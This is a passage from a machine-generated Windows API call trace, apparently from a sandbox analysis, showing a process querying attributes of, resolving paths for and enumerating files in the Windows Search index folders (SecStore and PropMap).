Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.002" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\secstore\\cist0000.002"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x420c80b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1 [0252.607] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.608] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0252.608] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.002" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\secstore\\cist0000.002"), fInfoLevelId=0x0, lpFileInformation=0x700b1e4 | out: lpFileInformation=0x700b1e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x420c80b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1 [0252.608] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0252.608] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.002", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.002", lpFilePart=0x0) returned 0x68 [0252.608] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.002", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.002", lpFilePart=0x0) returned 0x68 [0252.608] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.608] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.002" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\secstore\\cist0000.002"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x420c80b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1 [0252.608] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.608] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.002", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.002", lpFilePart=0x0) returned 0x68 [0252.608] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0252.608] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap", lpFilePart=0x0) returned 0x5a [0252.608] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\", lpFilePart=0x0) returned 0x5b [0252.608] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27eb7240, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27edd3a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27edd3a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0252.609] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27eb7240, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27edd3a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27edd3a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0252.609] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x27eb7240, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27eb7240, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x422b7290, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiPT0000.000", cAlternateFileName="")) returned 1 [0252.609] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x27edd3a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27edd3a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27f75920, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiPT0000.001", cAlternateFileName="")) returned 1 [0252.609] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x27edd3a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27edd3a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27f75920, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiPT0000.002", cAlternateFileName="")) returned 1 [0252.609] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x27edd3a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27edd3a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27f75920, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiPT0000.002", cAlternateFileName="")) returned 0 [0252.609] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0252.610] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0252.610] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0252.610] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0252.610] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap", lpFilePart=0x0) returned 0x5a [0252.610] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\", lpFilePart=0x0) returned 0x5b [0252.610] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27eb7240, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27edd3a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27edd3a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0252.610] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27eb7240, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27edd3a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27edd3a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0252.610] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x27eb7240, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27eb7240, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x422b7290, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiPT0000.000", cAlternateFileName="")) returned 1 [0252.610] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x27edd3a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27edd3a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27f75920, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiPT0000.001", cAlternateFileName="")) returned 1 [0252.610] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x27edd3a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27edd3a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27f75920, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiPT0000.002", cAlternateFileName="")) returned 1 [0252.611] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0252.611] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0252.611] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0252.611] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0252.611] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", lpFilePart=0x0) returned 0x67 [0252.611] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", lpFilePart=0x0) returned 0x67 [0252.611] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", lpFilePart=0x0) returned 0x67 [0252.611] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", lpFilePart=0x0) returned 0x67 [0252.611] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", lpFilePart=0x0) returned 0x67 [0252.611] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", lpFilePart=0x0) returned 0x67 [0252.611] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", lpFilePart=0x0) returned 0x67 [0252.611] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", lpFilePart=0x0) returned 0x67 [0252.611] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", lpFilePart=0x0) returned 0x67 [0252.611] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", lpFilePart=0x0) returned 0x67 [0252.611] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", lpFilePart=0x0) returned 0x67 [0252.612] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", lpFilePart=0x0) returned 0x67 [0252.612] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", lpFilePart=0x0) returned 0x67 [0252.612] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", lpFilePart=0x0) returned 0x67 [0252.612] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", lpFilePart=0x0) returned 0x67 [0252.612] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", lpFilePart=0x0) returned 0x67 [0252.612] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", lpFilePart=0x0) returned 0x67 [0252.612] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", lpFilePart=0x0) returned 0x67 [0252.612] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", lpFilePart=0x0) returned 0x67 [0252.612] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.612] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\propmap\\cipt0000.000"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x27eb7240, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27eb7240, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x422b7290, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xf0)) returned 1 [0252.612] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.612] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0252.612] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\propmap\\cipt0000.000"), fInfoLevelId=0x0, lpFileInformation=0x7012134 | out: lpFileInformation=0x7012134*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x27eb7240, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27eb7240, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x422b7290, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xf0)) returned 1 [0252.613] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0252.613] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", lpFilePart=0x0) returned 0x67 [0252.613] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", lpFilePart=0x0) returned 0x67 [0252.613] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.613] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\propmap\\cipt0000.000"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x27eb7240, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27eb7240, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x422b7290, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xf0)) returned 1 [0252.613] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.613] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.000", lpFilePart=0x0) returned 0x67 [0252.613] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.613] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.001" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\propmap\\cipt0000.001"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x27edd3a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27edd3a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27f75920, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1 [0252.618] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.618] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0252.618] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.001" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\propmap\\cipt0000.001"), fInfoLevelId=0x0, lpFileInformation=0x7015f58 | out: lpFileInformation=0x7015f58*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x27edd3a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27edd3a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27f75920, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1 [0252.618] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0252.618] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.001", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.001", lpFilePart=0x0) returned 0x67 [0252.618] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.001", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.001", lpFilePart=0x0) returned 0x67 [0252.618] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.618] 